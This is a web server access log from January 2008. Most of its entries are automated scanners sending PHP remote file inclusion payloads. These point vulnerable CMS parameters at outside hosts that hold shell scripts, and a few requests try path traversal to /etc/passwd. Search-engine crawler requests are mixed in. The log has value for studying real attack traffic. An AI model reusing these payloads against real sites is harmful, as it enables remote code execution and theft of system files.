212.72.183.210 - - [18/Jan/2008:17:44:50 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:44:58 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:17:45:05 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:17:45:05 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:17:46:27 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:17:46:30 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:17:47:03 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:17:47:16 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:17:47:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:17:48:08 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:17:48:09 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:17:48:09 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:48:15 -0800] "GET /bikes/dteel/140CANON/ HTTP/1.1" 200 987 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:17:49:18 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:17:49:18 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:17:49:20 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.108.143 - - [18/Jan/2008:17:49:22 -0800] "GET /logs/access_071228.log/becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:50:16 -0800] "GET /logs/access_071231.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:55:03 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:55:03 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:55:03 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:56:23 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:56:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:17:57:47 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.212.34 - - [18/Jan/2008:17:57:54 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.212.34 - - [18/Jan/2008:17:57:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:17:57:59 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:17:57:59 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:58:05 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:58:05 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:58:36 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:18:00:24 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.93.212.34 - - [18/Jan/2008:18:00:59 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:18:01:23 -0800] "GET /logs/access_071122.log/general.php?module=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:18:01:24 -0800] "GET /general.php?module=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:18:01:24 -0800] "GET /logs/general.php?module=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:18:03:05 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:18:03:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.240.89 - - [18/Jan/2008:18:04:02 -0800] "GET /logs/index.php?syf=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.193.240.89 - - [18/Jan/2008:18:04:02 -0800] "GET /index.php?syf=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:08:47 -0800] "GET /logs/access_071219.log/http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:08:47 -0800] "GET /logs/access_071219.log/http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:08:47 -0800] "GET /http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:08:47 -0800] "GET /http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:08:47 -0800] "GET /logs/http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:08:47 -0800] "GET /logs/http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:11:46 -0800] "GET /logs/access.log/http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:18:11:51 -0800] "GET /logs/access.log/http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.155.109.117 - - [18/Jan/2008:18:12:51 -0800] "GET /logs/access_071229.log/index.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [18/Jan/2008:18:12:51 -0800] "GET /index.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [18/Jan/2008:18:12:52 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:18:13:42 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.52.146 - - [18/Jan/2008:18:15:41 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:18:16:05 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:18:16:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.225 - - [18/Jan/2008:18:17:48 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.149 - - [18/Jan/2008:18:18:16 -0800] "GET /logs/access_071103.log HTTP/1.0" 200 57650 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:18:18:55 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:18:19:47 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:18:19:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:18:19:48 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:18:23:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.200 - - [18/Jan/2008:18:23:34 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:18:24:20 -0800] "GET /tools/ HTTP/1.1" 200 12404 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.29.68.240 - - [18/Jan/2008:18:25:05 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.240 - - [18/Jan/2008:18:25:06 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.240 - - [18/Jan/2008:18:25:06 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.240 - - [18/Jan/2008:18:27:45 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:18:28:56 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:18:28:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:18:30:23 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:18:30:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:18:30:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.240.89 - - [18/Jan/2008:18:32:19 -0800] "GET /index.php?sf=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.193.240.89 - - [18/Jan/2008:18:32:19 -0800] "GET /logs/index.php?sf=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.194.149.12 - - [18/Jan/2008:18:32:43 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [18/Jan/2008:18:32:43 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [18/Jan/2008:18:33:10 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [18/Jan/2008:18:33:10 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:18:33:35 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:18:33:35 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:18:35:50 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:18:35:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:18:39:46 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:18:39:46 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:18:39:46 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.220.191.9 - - [18/Jan/2008:18:39:48 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:18:40:18 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.160 - - [18/Jan/2008:18:44:45 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.200.78.44 - - [18/Jan/2008:18:45:36 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.78.44 - - [18/Jan/2008:18:45:36 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.78.44 - - [18/Jan/2008:18:47:53 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.78.44 - - [18/Jan/2008:18:47:54 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:18:48:28 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:18:48:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:18:48:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [18/Jan/2008:18:51:00 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [18/Jan/2008:18:51:00 -0800] "GET /logs//login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [18/Jan/2008:18:51:01 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [18/Jan/2008:18:51:01 -0800] "GET //login.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.164 - - [18/Jan/2008:18:54:38 -0800] "GET /logs/access_071011.log HTTP/1.0" 200 23938 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.26 - - [18/Jan/2008:18:59:13 -0800] "GET /minamijewelry/source_images/?S=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:18:59:59 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:18:59:59 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:19:00:00 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [18/Jan/2008:19:00:35 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:19:01:10 -0800] "GET /bikes/dteel/15JAN08/ HTTP/1.1" 200 710 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:19:04:37 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:19:04:37 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:19:05:12 -0800] "GET /index1.php?choix=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.22.74.2 - - [18/Jan/2008:19:18:10 -0800] "GET /logs/access_071229.log/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.22.74.2 - - [18/Jan/2008:19:18:11 -0800] "GET /tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.22.74.2 - - [18/Jan/2008:19:18:11 -0800] "GET /logs/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.22.74.2 - - [18/Jan/2008:19:20:25 -0800] "GET /logs/access_071216.log/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:19:21:20 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:19:21:21 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:19:21:21 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:19:22:15 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:19:23:43 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.14 - - [18/Jan/2008:19:25:40 -0800] "GET /logs/access_071108.log HTTP/1.0" 200 10768 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.144 - - [18/Jan/2008:19:31:07 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
